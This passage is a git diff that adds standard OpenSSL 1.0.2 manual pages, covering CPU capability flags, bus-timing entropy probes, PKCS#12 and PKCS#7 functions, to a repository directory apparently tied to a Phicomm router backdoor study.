+Intel P4 processor 'env OPENSSL_ia32cap=0x16980010 apps/openssl', or
+better yet 'env OPENSSL_ia32cap=~0x1000000 apps/openssl' to achieve same
+effect without modifying the application source code. Alternatively you
+can reconfigure the toolkit with no-sse2 option and recompile.
+
+Less intuitive is clearing bit #28. The truth is that it's not copied
+from CPUID output verbatim, but is adjusted to reflect whether or not
+the data cache is actually shared between logical cores. This in turn
+affects the decision on whether or not expensive countermeasures
+against cache-timing attacks are applied, most notably in AES assembler
+module.
+
+The vector is further extended with EBX value returned by CPUID with
+EAX=7 and ECX=0 as input. Following bits are significant:
+
+=over
+
+=item bit #64+3 denoting availability of BMI1 instructions, e.g. ANDN;
+
+=item bit #64+5 denoting availability of AVX2 instructions;
+
+=item bit #64+8 denoting availability of BMI2 instructions, e.g. MUXL
+and RORX;
+
+=item bit #64+18 denoting availability of RDSEED instruction;
+
+=item bit #64+19 denoting availability of ADCX and ADOX instructions;
+
+=back
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_instrument_bus.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_instrument_bus.pod
new file mode 100644
index 0000000..4ed83e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_instrument_bus.pod
@@ -0,0 +1,42 @@
+=pod
+
+=head1 NAME
+
+OPENSSL_instrument_bus, OPENSSL_instrument_bus2 - instrument references to memory bus
+
+=head1 SYNOPSIS
+
+ #ifdef OPENSSL_CPUID_OBJ
+ size_t OPENSSL_instrument_bus (int *vector,size_t num);
+ size_t OPENSSL_instrument_bus2(int *vector,size_t num,size_t max);
+ #endif
+
+=head1 DESCRIPTION
+
+It was empirically found that timings of references to primary memory
+are subject to irregular, apparently non-deterministic variations. The
+subroutines in question instrument these references for purposes of
+gathering entropy for random number generator. In order to make it
+bus-bound a 'flush cache line' instruction is used between probes. In
+addition probes are added to B<vector> elements in atomic or
+interlocked manner, which should contribute additional noise on
+multi-processor systems. This also means that B<vector[num]> should be
+zeroed upon invocation (if you want to retrieve actual probe values).
+
+OPENSSL_instrument_bus performs B<num> probes and records the number of
+oscillator cycles every probe took.
+
+OPENSSL_instrument_bus2 on the other hand B<accumulates> consecutive
+probes with the same value, i.e. in a way it records duration of
+periods when probe values appeared deterministic. The subroutine
+performs at most B<max> probes in attempt to fill the B<vector[num]>,
+with B<max> value of 0 meaning "as many as it takes."
+
+=head1 RETURN VALUE
+
+Return value of 0 indicates that CPU is not capable of performing the
+benchmark, either because oscillator counter or 'flush cache line' is
+not available on current platform. For reference, on x86 'flush cache
+line' was introduced with the SSE2 extensions.
+
+Otherwise number of recorded values is returned.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_load_builtin_modules.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_load_builtin_modules.pod
new file mode 100644
index 0000000..de62912
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OPENSSL_load_builtin_modules.pod
@@ -0,0 +1,51 @@
+=pod
+
+=head1 NAME
+
+OPENSSL_load_builtin_modules, ASN1_add_oid_module, ENGINE_add_conf_module - add standard configuration modules
+
+=head1 SYNOPSIS
+
+ #include <openssl/conf.h>
+
+ void OPENSSL_load_builtin_modules(void);
+ void ASN1_add_oid_module(void);
+ ENGINE_add_conf_module();
+
+=head1 DESCRIPTION
+
+The function OPENSSL_load_builtin_modules() adds all the standard OpenSSL
+configuration modules to the internal list. They can then be used by the
+OpenSSL configuration code.
+
+ASN1_add_oid_module() adds just the ASN1 OBJECT module.
+
+ENGINE_add_conf_module() adds just the ENGINE configuration module.
+
+=head1 NOTES
+
+If the simple configuration function OPENSSL_config() is called then 
+OPENSSL_load_builtin_modules() is called automatically.
+
+Applications which use the configuration functions directly will need to
+call OPENSSL_load_builtin_modules() themselves I<before> any other 
+configuration code.
+
+Applications should call OPENSSL_load_builtin_modules() to load all
+configuration modules instead of adding modules selectively: otherwise 
+functionality may be missing from the application if an when new
+modules are added.
+
+=head1 RETURN VALUE
+
+None of the functions return a value.
+
+=head1 SEE ALSO
+
+L<conf(3)|conf(3)>, L<OPENSSL_config(3)|OPENSSL_config(3)>
+
+=head1 HISTORY
+
+These functions first appeared in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OpenSSL_add_all_algorithms.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OpenSSL_add_all_algorithms.pod
new file mode 100644
index 0000000..bcb79e5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/OpenSSL_add_all_algorithms.pod
@@ -0,0 +1,66 @@
+=pod
+
+=head1 NAME
+
+OpenSSL_add_all_algorithms, OpenSSL_add_all_ciphers, OpenSSL_add_all_digests, EVP_cleanup -
+add algorithms to internal table
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ void OpenSSL_add_all_algorithms(void);
+ void OpenSSL_add_all_ciphers(void);
+ void OpenSSL_add_all_digests(void);
+
+ void EVP_cleanup(void);
+
+=head1 DESCRIPTION
+
+OpenSSL keeps an internal table of digest algorithms and ciphers. It uses
+this table to lookup ciphers via functions such as EVP_get_cipher_byname().
+
+OpenSSL_add_all_digests() adds all digest algorithms to the table.
+
+OpenSSL_add_all_algorithms() adds all algorithms to the table (digests and
+ciphers).
+
+OpenSSL_add_all_ciphers() adds all encryption algorithms to the table including
+password based encryption algorithms.
+
+EVP_cleanup() removes all ciphers and digests from the table.
+
+=head1 RETURN VALUES
+
+None of the functions return a value.
+
+=head1 NOTES
+
+A typical application will call OpenSSL_add_all_algorithms() initially and
+EVP_cleanup() before exiting.
+
+An application does not need to add algorithms to use them explicitly, for example
+by EVP_sha1(). It just needs to add them if it (or any of the functions it calls)
+needs to lookup algorithms.
+
+The cipher and digest lookup functions are used in many parts of the library. If
+the table is not initialized several functions will misbehave and complain they
+cannot find algorithms. This includes the PEM, PKCS#12, SSL and S/MIME libraries.
+This is a common query in the OpenSSL mailing lists.
+
+Calling OpenSSL_add_all_algorithms() links in all algorithms: as a result a
+statically linked executable can be quite large. If this is important it is possible
+to just add the required ciphers and digests.
+
+=head1 BUGS
+
+Although the functions do not return error codes it is possible for them to fail.
+This will only happen as a result of a memory allocation failure so this is not
+too much of a problem in practice.
+
+=head1 SEE ALSO
+
+L<evp(3)|evp(3)>, L<EVP_DigestInit(3)|EVP_DigestInit(3)>,
+L<EVP_EncryptInit(3)|EVP_EncryptInit(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PEM_write_bio_CMS_stream.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PEM_write_bio_CMS_stream.pod
new file mode 100644
index 0000000..e070c45
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PEM_write_bio_CMS_stream.pod
@@ -0,0 +1,41 @@
+=pod
+
+=head1 NAME
+
+ PEM_write_bio_CMS_stream - output CMS_ContentInfo structure in PEM format.
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+ #include <openssl/pem.h>
+
+ int PEM_write_bio_CMS_stream(BIO *out, CMS_ContentInfo *cms, BIO *data, int flags);
+
+=head1 DESCRIPTION
+
+PEM_write_bio_CMS_stream() outputs a CMS_ContentInfo structure in PEM format.
+
+It is otherwise identical to the function SMIME_write_CMS().
+
+=head1 NOTES
+
+This function is effectively a version of the PEM_write_bio_CMS() supporting
+streaming.
+
+=head1 RETURN VALUES
+
+PEM_write_bio_CMS_stream() returns 1 for success or 0 for failure.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_verify(3)|CMS_verify(3)>, L<CMS_encrypt(3)|CMS_encrypt(3)>
+L<CMS_decrypt(3)|CMS_decrypt(3)>,
+L<SMIME_write_CMS(3)|SMIME_write_CMS(3)>,
+L<i2d_CMS_bio_stream(3)|i2d_CMS_bio_stream(3)>
+
+=head1 HISTORY
+
+PEM_write_bio_CMS_stream() was added to OpenSSL 1.0.0
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PEM_write_bio_PKCS7_stream.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PEM_write_bio_PKCS7_stream.pod
new file mode 100644
index 0000000..16fc9b6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PEM_write_bio_PKCS7_stream.pod
@@ -0,0 +1,41 @@
+=pod
+
+=head1 NAME
+
+PEM_write_bio_PKCS7_stream - output PKCS7 structure in PEM format.
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+ #include <openssl/pem.h>
+
+ int PEM_write_bio_PKCS7_stream(BIO *out, PKCS7 *p7, BIO *data, int flags);
+
+=head1 DESCRIPTION
+
+PEM_write_bio_PKCS7_stream() outputs a PKCS7 structure in PEM format.
+
+It is otherwise identical to the function SMIME_write_PKCS7().
+
+=head1 NOTES
+
+This function is effectively a version of the PEM_write_bio_PKCS7() supporting
+streaming.
+
+=head1 RETURN VALUES
+
+PEM_write_bio_PKCS7_stream() returns 1 for success or 0 for failure.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_sign(3)|PKCS7_sign(3)>,
+L<PKCS7_verify(3)|PKCS7_verify(3)>, L<PKCS7_encrypt(3)|PKCS7_encrypt(3)>
+L<PKCS7_decrypt(3)|PKCS7_decrypt(3)>,
+L<SMIME_write_PKCS7(3)|SMIME_write_PKCS7(3)>,
+L<i2d_PKCS7_bio_stream(3)|i2d_PKCS7_bio_stream(3)>
+
+=head1 HISTORY
+
+PEM_write_bio_PKCS7_stream() was added to OpenSSL 1.0.0
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS12_create.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS12_create.pod
new file mode 100644
index 0000000..de7cab2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS12_create.pod
@@ -0,0 +1,75 @@
+=pod
+
+=head1 NAME
+
+PKCS12_create - create a PKCS#12 structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs12.h>
+
+ PKCS12 *PKCS12_create(char *pass, char *name, EVP_PKEY *pkey, X509 *cert, STACK_OF(X509) *ca,
+				int nid_key, int nid_cert, int iter, int mac_iter, int keytype);
+
+=head1 DESCRIPTION
+
+PKCS12_create() creates a PKCS#12 structure.
+
+B<pass> is the passphrase to use. B<name> is the B<friendlyName> to use for
+the supplied certifictate and key. B<pkey> is the private key to include in
+the structure and B<cert> its corresponding certificates. B<ca>, if not B<NULL>
+is an optional set of certificates to also include in the structure.
+
+B<nid_key> and B<nid_cert> are the encryption algorithms that should be used
+for the key and certificate respectively. B<iter> is the encryption algorithm
+iteration count to use and B<mac_iter> is the MAC iteration count to use.
+B<keytype> is the type of key.
+
+=head1 NOTES
+
+The parameters B<nid_key>, B<nid_cert>, B<iter>, B<mac_iter> and B<keytype>
+can all be set to zero and sensible defaults will be used.
+
+These defaults are: 40 bit RC2 encryption for certificates, triple DES
+encryption for private keys, a key iteration count of PKCS12_DEFAULT_ITER
+(currently 2048) and a MAC iteration count of 1.
+
+The default MAC iteration count is 1 in order to retain compatibility with
+old software which did not interpret MAC iteration counts. If such compatibility
+is not required then B<mac_iter> should be set to PKCS12_DEFAULT_ITER.
+
+B<keytype> adds a flag to the store private key. This is a non standard extension
+that is only currently interpreted by MSIE. If set to zero the flag is omitted,
+if set to B<KEY_SIG> the key can be used for signing only, if set to B<KEY_EX>
+it can be used for signing and encryption. This option was useful for old
+export grade software which could use signing only keys of arbitrary size but
+had restrictions on the permissible sizes of keys which could be used for
+encryption.
+
+=head1 NEW FUNCTIONALITY IN OPENSSL 0.9.8
+
+Some additional functionality was added to PKCS12_create() in OpenSSL
+0.9.8. These extensions are detailed below.
+
+If a certificate contains an B<alias> or B<keyid> then this will be
+used for the corresponding B<friendlyName> or B<localKeyID> in the
+PKCS12 structure.
+
+Either B<pkey>, B<cert> or both can be B<NULL> to indicate that no key or
+certficate is required. In previous versions both had to be present or
+a fatal error is returned.
+
+B<nid_key> or B<nid_cert> can be set to -1 indicating that no encryption
+should be used. 
+
+B<mac_iter> can be set to -1 and the MAC will then be omitted entirely.
+
+=head1 SEE ALSO
+
+L<d2i_PKCS12(3)|d2i_PKCS12(3)>
+
+=head1 HISTORY
+
+PKCS12_create was added in OpenSSL 0.9.3
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS12_parse.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS12_parse.pod
new file mode 100644
index 0000000..c54cf2a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS12_parse.pod
@@ -0,0 +1,57 @@
+=pod
+
+=head1 NAME
+
+PKCS12_parse - parse a PKCS#12 structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs12.h>
+
+int PKCS12_parse(PKCS12 *p12, const char *pass, EVP_PKEY **pkey, X509 **cert, STACK_OF(X509) **ca);
+
+=head1 DESCRIPTION
+
+PKCS12_parse() parses a PKCS12 structure.
+
+B<p12> is the B<PKCS12> structure to parse. B<pass> is the passphrase to use.
+If successful the private key will be written to B<*pkey>, the corresponding
+certificate to B<*cert> and any additional certificates to B<*ca>.
+
+=head1 NOTES
+
+The parameters B<pkey> and B<cert> cannot be B<NULL>. B<ca> can be <NULL> in
+which case additional certificates will be discarded. B<*ca> can also be a
+valid STACK in which case additional certificates are appended to B<*ca>. If
+B<*ca> is B<NULL> a new STACK will be allocated.
+
+The B<friendlyName> and B<localKeyID> attributes (if present) on each
+certificate will be stored in the B<alias> and B<keyid> attributes of the
+B<X509> structure.
+
+=head1 RETURN VALUES
+
+PKCS12_parse() returns 1 for success and zero if an error occurred.
+
+The error can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 BUGS
+
+Only a single private key and corresponding certificate is returned by this
+function. More complex PKCS#12 files with multiple private keys will only
+return the first match.
+
+Only B<friendlyName> and B<localKeyID> attributes are currently stored in
+certificates. Other attributes are discarded.
+
+Attributes currently cannot be stored in the private key B<EVP_PKEY> structure.
+
+=head1 SEE ALSO
+
+L<d2i_PKCS12(3)|d2i_PKCS12(3)>
+
+=head1 HISTORY
+
+PKCS12_parse was added in OpenSSL 0.9.3
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_decrypt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_decrypt.pod
new file mode 100644
index 0000000..325699d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_decrypt.pod
@@ -0,0 +1,55 @@
+=pod
+
+=head1 NAME
+
+PKCS7_decrypt - decrypt content from a PKCS#7 envelopedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+
+ int PKCS7_decrypt(PKCS7 *p7, EVP_PKEY *pkey, X509 *cert, BIO *data, int flags);
+
+=head1 DESCRIPTION
+
+PKCS7_decrypt() extracts and decrypts the content from a PKCS#7 envelopedData
+structure. B<pkey> is the private key of the recipient, B<cert> is the
+recipients certificate, B<data> is a BIO to write the content to and
+B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+OpenSSL_add_all_algorithms() (or equivalent) should be called before using this
+function or errors about unknown algorithms will occur.
+
+Although the recipients certificate is not needed to decrypt the data it is needed
+to locate the appropriate (of possible several) recipients in the PKCS#7 structure.
+
+The following flags can be passed in the B<flags> parameter.
+
+If the B<PKCS7_TEXT> flag is set MIME headers for type B<text/plain> are deleted
+from the content. If the content is not of type B<text/plain> then an error is
+returned.
+
+=head1 RETURN VALUES
+
+PKCS7_decrypt() returns either 1 for success or 0 for failure.
+The error can be obtained from ERR_get_error(3)
+
+=head1 BUGS
+
+PKCS7_decrypt() must be passed the correct recipient key and certificate. It would
+be better if it could look up the correct key and certificate from a database.
+
+The lack of single pass processing and need to hold all data in memory as
+mentioned in PKCS7_sign() also applies to PKCS7_verify().
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_encrypt(3)|PKCS7_encrypt(3)>
+
+=head1 HISTORY
+
+PKCS7_decrypt() was added to OpenSSL 0.9.5
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_encrypt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_encrypt.pod
new file mode 100644
index 0000000..2cd925a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_encrypt.pod
@@ -0,0 +1,80 @@
+=pod
+
+=head1 NAME
+
+PKCS7_encrypt - create a PKCS#7 envelopedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+
+ PKCS7 *PKCS7_encrypt(STACK_OF(X509) *certs, BIO *in, const EVP_CIPHER *cipher, int flags);
+
+=head1 DESCRIPTION
+
+PKCS7_encrypt() creates and returns a PKCS#7 envelopedData structure. B<certs>
+is a list of recipient certificates. B<in> is the content to be encrypted.
+B<cipher> is the symmetric cipher to use. B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+Only RSA keys are supported in PKCS#7 and envelopedData so the recipient
+certificates supplied to this function must all contain RSA public keys, though
+they do not have to be signed using the RSA algorithm.
+
+EVP_des_ede3_cbc() (triple DES) is the algorithm of choice for S/MIME use
+because most clients will support it.
+
+Some old "export grade" clients may only support weak encryption using 40 or 64
+bit RC2. These can be used by passing EVP_rc2_40_cbc() and EVP_rc2_64_cbc()
+respectively.
+
+The algorithm passed in the B<cipher> parameter must support ASN1 encoding of
+its parameters. 
+
+Many browsers implement a "sign and encrypt" option which is simply an S/MIME
+envelopedData containing an S/MIME signed message. This can be readily produced
+by storing the S/MIME signed message in a memory BIO and passing it to
+PKCS7_encrypt().
+
+The following flags can be passed in the B<flags> parameter.
+
+If the B<PKCS7_TEXT> flag is set MIME headers for type B<text/plain> are
+prepended to the data.
+
+Normally the supplied content is translated into MIME canonical format (as
+required by the S/MIME specifications) if B<PKCS7_BINARY> is set no translation
+occurs. This option should be used if the supplied data is in binary format
+otherwise the translation will corrupt it. If B<PKCS7_BINARY> is set then
+B<PKCS7_TEXT> is ignored.
+
+If the B<PKCS7_STREAM> flag is set a partial B<PKCS7> structure is output
+suitable for streaming I/O: no data is read from the BIO B<in>.
+
+=head1 NOTES
+
+If the flag B<PKCS7_STREAM> is set the returned B<PKCS7> structure is B<not>
+complete and outputting its contents via a function that does not
+properly finalize the B<PKCS7> structure will give unpredictable 
+results.
+
+Several functions including SMIME_write_PKCS7(), i2d_PKCS7_bio_stream(),
+PEM_write_bio_PKCS7_stream() finalize the structure. Alternatively finalization
+can be performed by obtaining the streaming ASN1 B<BIO> directly using
+BIO_new_PKCS7().
+
+=head1 RETURN VALUES
+
+PKCS7_encrypt() returns either a PKCS7 structure or NULL if an error occurred.
+The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_decrypt(3)|PKCS7_decrypt(3)>
+
+=head1 HISTORY
+
+PKCS7_decrypt() was added to OpenSSL 0.9.5
+The B<PKCS7_STREAM> flag was first supported in OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_sign.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_sign.pod
new file mode 100644
index 0000000..64a3514
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_sign.pod
@@ -0,0 +1,116 @@
+=pod
+
+=head1 NAME
+
+PKCS7_sign - create a PKCS#7 signedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+
+ PKCS7 *PKCS7_sign(X509 *signcert, EVP_PKEY *pkey, STACK_OF(X509) *certs, BIO *data, int flags);
+
+=head1 DESCRIPTION
+
+PKCS7_sign() creates and returns a PKCS#7 signedData structure. B<signcert> is
+the certificate to sign with, B<pkey> is the corresponsding private key.
+B<certs> is an optional additional set of certificates to include in the PKCS#7
+structure (for example any intermediate CAs in the chain). 
+
+The data to be signed is read from BIO B<data>.
+
+B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+Any of the following flags (ored together) can be passed in the B<flags>
+parameter.
+
+Many S/MIME clients expect the signed content to include valid MIME headers. If
+the B<PKCS7_TEXT> flag is set MIME headers for type B<text/plain> are prepended
+to the data.
+
+If B<PKCS7_NOCERTS> is set the signer's certificate will not be included in the
+PKCS7 structure, the signer's certificate must still be supplied in the
+B<signcert> parameter though. This can reduce the size of the signature if the
+signers certificate can be obtained by other means: for example a previously
+signed message.
+
+The data being signed is included in the PKCS7 structure, unless
+B<PKCS7_DETACHED> is set in which case it is omitted. This is used for PKCS7
+detached signatures which are used in S/MIME plaintext signed messages for
+example.
+
+Normally the supplied content is translated into MIME canonical format (as
+required by the S/MIME specifications) if B<PKCS7_BINARY> is set no translation
+occurs. This option should be used if the supplied data is in binary format
+otherwise the translation will corrupt it.
+
+The signedData structure includes several PKCS#7 autenticatedAttributes
+including the signing time, the PKCS#7 content type and the supported list of
+ciphers in an SMIMECapabilities attribute. If B<PKCS7_NOATTR> is set then no
+authenticatedAttributes will be used. If B<PKCS7_NOSMIMECAP> is set then just
+the SMIMECapabilities are omitted.
+
+If present the SMIMECapabilities attribute indicates support for the following
+algorithms: triple DES, 128 bit RC2, 64 bit RC2, DES and 40 bit RC2. If any of
+these algorithms is disabled then it will not be included.
+
+If the flags B<PKCS7_STREAM> is set then the returned B<PKCS7> structure is
+just initialized ready to perform the signing operation. The signing is however
+B<not> performed and the data to be signed is not read from the B<data>
+parameter. Signing is deferred until after the data has been written. In this
+way data can be signed in a single pass.
+
+If the B<PKCS7_PARTIAL> flag is set a partial B<PKCS7> structure is output to
+which additional signers and capabilities can be added before finalization.
+
+
+=head1 NOTES
+
+If the flag B<PKCS7_STREAM> is set the returned B<PKCS7> structure is B<not>
+complete and outputting its contents via a function that does not properly
+finalize the B<PKCS7> structure will give unpredictable results.
+
+Several functions including SMIME_write_PKCS7(), i2d_PKCS7_bio_stream(),
+PEM_write_bio_PKCS7_stream() finalize the structure. Alternatively finalization
+can be performed by obtaining the streaming ASN1 B<BIO> directly using
+BIO_new_PKCS7().
+
+If a signer is specified it will use the default digest for the signing
+algorithm. This is B<SHA1> for both RSA and DSA keys.
+
+In OpenSSL 1.0.0 the B<certs>, B<signcert> and B<pkey> parameters can all be
+B<NULL> if the B<PKCS7_PARTIAL> flag is set. One or more signers can be added
+using the function B<PKCS7_sign_add_signer()>. B<PKCS7_final()> must also be
+called to finalize the structure if streaming is not enabled. Alternative
+signing digests can also be specified using this method.
+
+In OpenSSL 1.0.0 if B<signcert> and B<pkey> are NULL then a certificates only
+PKCS#7 structure is output.
+
+In versions of OpenSSL before 1.0.0 the B<signcert> and B<pkey> parameters must
+B<NOT> be NULL.
+
+=head1 BUGS
+
+Some advanced attributes such as counter signatures are not supported.
+
+=head1 RETURN VALUES
+
+PKCS7_sign() returns either a valid PKCS7 structure or NULL if an error
+occurred.  The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_verify(3)|PKCS7_verify(3)>
+
+=head1 HISTORY
+
+PKCS7_sign() was added to OpenSSL 0.9.5
+
+The B<PKCS7_PARTIAL> flag was added in OpenSSL 1.0.0
+
+The B<PKCS7_STREAM> flag was added in OpenSSL 1.0.0
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_sign_add_signer.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_sign_add_signer.pod
new file mode 100644
index 0000000..ebec4d5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_sign_add_signer.pod
@@ -0,0 +1,87 @@
+=pod
+
+=head1 NAME
+
+PKCS7_sign_add_signer - add a signer PKCS7 signed data structure.
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+
+ PKCS7_SIGNER_INFO *PKCS7_sign_add_signer(PKCS7 *p7, X509 *signcert, EVP_PKEY *pkey, const EVP_MD *md, int flags);
+
+
+=head1 DESCRIPTION
+
+PKCS7_sign_add_signer() adds a signer with certificate B<signcert> and private
+key B<pkey> using message digest B<md> to a PKCS7 signed data structure
+B<p7>.
+
+The PKCS7 structure should be obtained from an initial call to PKCS7_sign()
+with the flag B<PKCS7_PARTIAL> set or in the case or re-signing a valid PKCS7
+signed data structure.
+
+If the B<md> parameter is B<NULL> then the default digest for the public
+key algorithm will be used.
+
+Unless the B<PKCS7_REUSE_DIGEST> flag is set the returned PKCS7 structure
+is not complete and must be finalized either by streaming (if applicable) or
+a call to PKCS7_final().
+
+
+=head1 NOTES
+
+The main purpose of this function is to provide finer control over a PKCS#7
+signed data structure where the simpler PKCS7_sign() function defaults are
+not appropriate. For example if multiple signers or non default digest
+algorithms are needed.
+
+Any of the following flags (ored together) can be passed in the B<flags>
+parameter.
+
+If B<PKCS7_REUSE_DIGEST> is set then an attempt is made to copy the content
+digest value from the PKCS7 struture: to add a signer to an existing structure.
+An error occurs if a matching digest value cannot be found to copy. The
+returned PKCS7 structure will be valid and finalized when this flag is set.
+
+If B<PKCS7_PARTIAL> is set in addition to B<PKCS7_REUSE_DIGEST> then the 
+B<PKCS7_SIGNER_INO> structure will not be finalized so additional attributes
+can be added. In this case an explicit call to PKCS7_SIGNER_INFO_sign() is
+needed to finalize it.
+
+If B<PKCS7_NOCERTS> is set the signer's certificate will not be included in the
+PKCS7 structure, the signer's certificate must still be supplied in the
+B<signcert> parameter though. This can reduce the size of the signature if the
+signers certificate can be obtained by other means: for example a previously
+signed message.
+
+The signedData structure includes several PKCS#7 autenticatedAttributes
+including the signing time, the PKCS#7 content type and the supported list of
+ciphers in an SMIMECapabilities attribute. If B<PKCS7_NOATTR> is set then no
+authenticatedAttributes will be used. If B<PKCS7_NOSMIMECAP> is set then just
+the SMIMECapabilities are omitted.
+
+If present the SMIMECapabilities attribute indicates support for the following
+algorithms: triple DES, 128 bit RC2, 64 bit RC2, DES and 40 bit RC2. If any of
+these algorithms is disabled then it will not be included.
+
+
+PKCS7_sign_add_signers() returns an internal pointer to the PKCS7_SIGNER_INFO
+structure just added, this can be used to set additional attributes 
+before it is finalized.
+
+=head1 RETURN VALUES
+
+PKCS7_sign_add_signers() returns an internal pointer to the PKCS7_SIGNER_INFO
+structure just added or NULL if an error occurs.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_sign(3)|PKCS7_sign(3)>,
+L<PKCS7_final(3)|PKCS7_final(3)>,
+
+=head1 HISTORY
+
+PPKCS7_sign_add_signer() was added to OpenSSL 1.0.0
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_verify.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_verify.pod
new file mode 100644
index 0000000..f083306
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/PKCS7_verify.pod
@@ -0,0 +1,118 @@
+=pod
+
+=head1 NAME
+
+PKCS7_verify, PKCS7_get0_signers - verify a PKCS#7 signedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+
+ int PKCS7_verify(PKCS7 *p7, STACK_OF(X509) *certs, X509_STORE *store, BIO *indata, BIO *out, int flags);
+
+ STACK_OF(X509) *PKCS7_get0_signers(PKCS7 *p7, STACK_OF(X509) *certs, int flags);
+
+=head1 DESCRIPTION
+
+PKCS7_verify() verifies a PKCS#7 signedData structure. B<p7> is the PKCS7
+structure to verify. B<certs> is a set of certificates in which to search for
+the signer's certificate. B<store> is a trusted certficate store (used for
+chain verification). B<indata> is the signed data if the content is not
+present in B<p7> (that is it is detached). The content is written to B<out>
+if it is not NULL.
+
+B<flags> is an optional set of flags, which can be used to modify the verify
+operation.
+
+PKCS7_get0_signers() retrieves the signer's certificates from B<p7>, it does
+B<not> check their validity or whether any signatures are valid. The B<certs>
+and B<flags> parameters have the same meanings as in PKCS7_verify().
+
+=head1 VERIFY PROCESS
+
+Normally the verify process proceeds as follows.
+
+Initially some sanity checks are performed on B<p7>. The type of B<p7> must
+be signedData. There must be at least one signature on the data and if
+the content is detached B<indata> cannot be B<NULL>.
+
+An attempt is made to locate all the signer's certificates, first looking in
+the B<certs> parameter (if it is not B<NULL>) and then looking in any certificates
